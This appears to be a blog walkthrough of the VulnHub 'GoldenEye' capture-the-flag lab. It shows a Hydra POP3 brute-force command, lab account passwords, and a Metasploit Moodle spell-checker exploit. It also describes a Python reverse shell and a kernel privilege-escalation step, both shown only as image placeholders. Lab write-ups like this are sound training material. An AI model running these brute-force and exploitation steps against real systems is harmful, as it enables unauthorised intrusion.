Post

GoldenEye

Posted Updated
GoldenEye Machine !
GoldenEye Machine !
By Shivendra Prajapati
2 min read

Description ⤵️

💡 GoldenEye ⤵️

I recently got done creating an OSCP type vulnerable machine that is themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I’d rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there is a hint of CTF flavor.

I’ve created and validated on VMware and VirtualBox. You would not need any extra tools other than what is on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click “retry” if prompted, upon initially starting it up because of formatting.

Changelog Beta - 2018-05-02 v1 - 2018-05-04

Let’s find the IP Address first »

Untitled

1

IP : 10.0.2.20

Port Scan Results ➡️

Untitled

Untitled

1
2
3
4
5

OPEN PORTS >
25     smtp
80     http
55006  pop3
55007  POP3

Web Enumeration ⤵️

Untitled

Lets check the source code →

Untitled

After Cracking it I got password for boris →

1

boris : InvincibleHack3r

After login I got this →

On checking Source code I got this →

Untitled

Untitled

I have tried pop3 with these credentials but no luck so lets brute fore the password for pop3 login with these users →

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 10.0.2.20 -s 55007 pop3

Untitled

1

boris : secret1!

Lets check the pop3 service now and see what we can →

79-6.png

79-7.png

79-8.png

79-8.png

79-9.png

Now lets check the password for natalya user →

79-10.png

1

natalya : bird

Lets try it out →

79-11.png

79-12.png

1
2

username: xenia
password: RCP90rulez!

severnaya-station.com in /etc/hosts.

79-13.png

79-14.png

79-15.png

Lets see the password for this user like that →

79-16.png

1

doak : goat

79-17.png

1
2

username: dr_doak
password: 4England!

After login I got this file →

79-18.png

79-19.png

79-20.png

79-21.png

1

admin : xWinter1995x!

Here I will be using metasploit to exploit this vulnerable moodle spelling site.

79-22.png

Here I have to enable pSpellShell option and save it to get the spell checking exploit work.

79-23.png

Now included the python reverse shell →

79-25.png

Now I get the reverse shell →

As my shell called by the spell checker function →

80-1.png

80-2.png

Here the OS is very outdated so lets find an exploit for it →

80-3.png

Since gcc is not present in the victim machine so I replaced it with cc which used to run in the time of UNIX systems.

Now After transferring the exploit to victim machine lets exploit it →

80-4.png

80-5.png

80-6.png

1

flag.txt → 568628e0d993b1973adc718237da6e93

80-7.png

If you have any questions or suggestions, please leave a comment below. Thank You !

VulnHub
POP3 Password Bruteforce PrivEsc Kernel Exploit moodle
This post is licensed under CC BY 4.0 by the author.